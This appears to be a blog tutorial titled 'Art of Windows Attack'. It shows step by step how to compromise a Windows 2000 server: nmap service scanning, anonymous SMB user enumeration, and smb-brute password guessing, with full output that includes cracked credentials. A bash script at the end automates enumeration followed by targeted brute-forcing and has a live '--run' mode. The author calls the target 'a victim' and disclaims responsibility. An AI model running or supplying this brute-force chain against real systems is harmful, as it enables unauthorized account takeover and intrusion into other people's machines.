

Art of Windows Attack
by peneter

Wednesday, 18 Jan 2012

OK, let's just get started. Keep in mind that I only use a target that is a victim, so whatever the risk, I'm not taking responsibility for it; I already took the risk yesterday, hahaha, so I'm just sharing it.

[0x01] scan and userenum

Here I'll cover how to get access to a target machine, where the target in question is a machine running Windows. Yup, as the title above says, the first step is to scan the target machine, and nmap is the tool for that. Why nmap and not something else? Because nmap is widely used and proven to work; anyone who prefers another scanner is free to use it, nobody is stopping you. The -sV flag below asks nmap to fingerprint the service behind each open port, which is what tells us the OS family and product versions we build on in the next steps.

 

kiddies@shellstr0m - nmap -sV 192.168.80.129

The result looks like this:

Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:03 GMT
Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap/nmap-services for security and consistency reasons. set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too).
Interesting ports on 192.168.80.129:
Not shown: 990 closed ports
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS webserver 5.0
135/tcp  open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
443/tcp  open  https?
445/tcp  open  microsoft-ds Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc        Microsoft Windows RPC
1027/tcp open  msrpc        Microsoft Windows RPC
1433/tcp open  ms-sql-s     Microsoft SQL Server 2000 8.00.194; RTM
3372/tcp open  msdtc?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=4.85BETA10%I=7%D=7/3%Time=4A4DD777%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"\x18\xc1\n\0x\x01")%r(RTSPRequest,6,"\x18\xc1\n\0x\x01")
SF:%r(HTTPOptions,6,"\x18\xc1\n\0x\x01")%r(Help,6,"\x18\xc1\n\0x\x01")%r(S
SF:SLSessionReq,6,"\x18\xc1\n\0x\x01")%r(FourOhFourRequest,6,"\x18\xc1\n\0
SF:x\x01")%r(LPDString,6,"\x18\xc1\n\0x\x01")%r(SIPOptions,6,"\x18\xc1\n\0
SF:x\x01");
MAC Address: 00:0C:29:CC:CF:46 (VMware)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.68 seconds


The scan lists a lot of open ports, and we can see that the server is running plenty of software: IIS, NetBIOS, SMB, MS SQL Server, and so on. As it happens, the server's OS is Windows 2000 (the microsoft-ds banner on 445/tcp says so outright, and IIS 5.0 on 80/tcp points the same way), so with the port listing from the scan we have several ways to go after it. What matters here is that NetBIOS and SMB on Windows 2000 accept a "NULL session", an anonymous connection to the IPC$ share, and through it we can enumerate every account on the box. This works because Windows 2000 ships with the RestrictAnonymous registry value at 0; an administrator who raised it to 2 would refuse the anonymous connection entirely, and the enumeration below would come back empty.
How to do the user enumeration:

kiddies@shellstr0m - nmap  --script=smb-enum-users 192.168.80.129

Result:
Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:21 GMT
Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap/nmap-services for security and consistency reasons. set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too).
Interesting ports on 192.168.80.129:
Not shown: 990 closed ports
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
1027/tcp open  IIS
1433/tcp open  ms-sql-s
3372/tcp open  msdtc
MAC Address: 00:0C:29:CC:CF:46 (VMware)

Host script results:
| smb-enum-users:
|_ SERVER\Administrator, SERVER\backup, SERVER\epp, SERVER\epp_contractor, SERVER\Guest, SERVER\IUSR_SERVER, SERVER\IWAM_SERVER, SERVER\Jim, SERVER\John, SERVER\mary, SERVER\molly, SERVER\None, SERVER\TsInternetUser

Nmap done: 1 IP address (1 host up) scanned in 0.63 seconds


From the output above we now know every user account on the target system:

- Administrator
- backup
- epp
- epp_contractor
- Guest
- IUSR_SERVER
- IWAM_SERVER
- Jim
- John
- mary
- molly
- TsInternetUser

Other techniques you can look up yourself, OK. To brute-force the logins with nmap, use this command (run like this, with no script-args, smb-brute falls back to nmap's built-in username and password lists; on a real engagement check the account lockout policy first, because every failed logon counts toward it):

kiddies@shellstr0m - nmap  --script=smb-brute 192.168.80.129

Result:

Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 10:38 GMT
Warning: File ./nmap-services exists, but Nmap is using /usr/local/share/nmap/nmap-services for security and consistency reasons. set NMAPDIR=. to give priority to files in your local directory (may affect the other data files too).
Interesting ports on 192.168.80.129:
Not shown: 990 closed ports
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
1027/tcp open  IIS
1433/tcp open  ms-sql-s
3372/tcp open  msdtc
MAC Address: 00:0C:29:CC:CF:46 (VMware)

Host script results:
| smb-brute:
| backup:pukcab => Login was successful
|_ epp:password => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 5.93 seconds

Done... that is, we're finished with the scanning and have the users and two working passwords. Note that backup's password is just the username reversed and epp's is literally "password", which is why such a short run found them.
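As an added example that is not part of the original post, the following bash script chains the three steps above so that smb-brute only tries the accounts smb-enum-users actually found: it pulls the account names out of nmap's smb-enum-users output, hands exactly those names to smb-brute through the userdb/passdb script-args, and pulls the hits back out of the smb-brute output. The file names users.txt and pass.txt, the password-candidate rule (the name itself, the name reversed, and two defaults) and the two sample nmap outputs embedded in the script are assumptions made for this example; the samples are constructed from the post's results so the parsing part runs offline without a target.

```bash
#!/usr/bin/env bash
# Added example (not part of the original post): glue the post's three steps
# together so smb-brute only attacks the accounts smb-enum-users returned.
# File names, the candidate-password rule and the sample output below are
# assumptions made for this example.
set -eu

# Constructed sample of what nmap prints for smb-enum-users, modelled on the
# post's result. nmap prints the user list on a single line; the post only
# looks multi-line because the blog wrapped it.
sample_enum_output() {
  cat <<'EOF'
Host script results:
| smb-enum-users:
|_ SERVER\Administrator, SERVER\backup, SERVER\epp, SERVER\epp_contractor, SERVER\Guest, SERVER\IUSR_SERVER, SERVER\IWAM_SERVER, SERVER\Jim, SERVER\John, SERVER\mary, SERVER\molly, SERVER\None, SERVER\TsInternetUser

Nmap done: 1 IP address (1 host up) scanned in 0.63 seconds
EOF
}

# Constructed sample of smb-brute output, again modelled on the post.
sample_brute_output() {
  cat <<'EOF'
Host script results:
| smb-brute:
| backup:pukcab => Login was successful
|_ epp:password => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 5.93 seconds
EOF
}

# stdin: nmap normal output  ->  stdout: one bare username per line, in the
# order nmap listed them, duplicates removed. Only DOMAIN\user tokens between
# the script header and the closing "|_" line are considered, so the same
# code copes with the old one-line format and the newer one-user-per-line
# format (which adds RID/flags lines that contain no backslash).
extract_smb_users() {
  awk '/smb-enum-users:/ {f=1; next} f {print} f && /^[|]_/ {f=0}' |
    grep -oE '[A-Za-z0-9_.-]+\\[A-Za-z0-9_.$-]+' |
    sed 's/^.*\\//' |
    awk '!seen[$0]++'
}

# stdin: smb-brute output  ->  stdout: user:pass for every hit. Old nmap
# reports "Login was successful", newer releases report "Valid credentials".
extract_smb_creds() {
  grep -E '=> *(Login was successful|Valid credentials)' |
    sed -E 's/^[| _]*//; s/ *=>.*$//'
}

# Cheap per-user candidates: the name itself, the name reversed (the post's
# backup:pukcab) and two defaults. Assumed rule; a real run uses a proper list.
candidate_passwords() {   # $1 = username
  u=$1
  printf '%s\n' "$u"
  printf '%s\n' "$u" | awk '{ for (i = length($0); i > 0; i--) printf "%s", substr($0, i, 1); print "" }'
  printf '%s\n' password Password1
}

# Online part, only reached with --run: enumerate, then brute-force just the
# enumerated accounts. smb-brute reads the lists through the userdb/passdb
# script-args handled by nmap's unpwdb library.
run_against() {           # $1 = target
  target=$1
  nmap -p 139,445 --script smb-enum-users "$target" | extract_smb_users > users.txt
  while read -r u; do candidate_passwords "$u"; done < users.txt | awk '!seen[$0]++' > pass.txt
  nmap -p 445 --script smb-brute --script-args "userdb=users.txt,passdb=pass.txt" "$target" |
    extract_smb_creds
}

if [ "${1:-}" = "--run" ]; then
  run_against "${2:?usage: $0 --run TARGET}"
else
  # Offline demo on the constructed samples.
  echo "users found:";  sample_enum_output | extract_smb_users
  echo "creds found:";  sample_brute_output | extract_smb_creds
fi
```

Run with no arguments and it only parses the embedded samples; run as `./smbchain.sh --run 192.168.80.129` (script name assumed) and it performs the live enumeration and brute-force. The reason for the userdb file is the lockout caveat above: every failed logon counts against an account lockout threshold where one is configured, so a short list tried against known accounts is both quicker and less likely to lock somebody out than nmap's default username list.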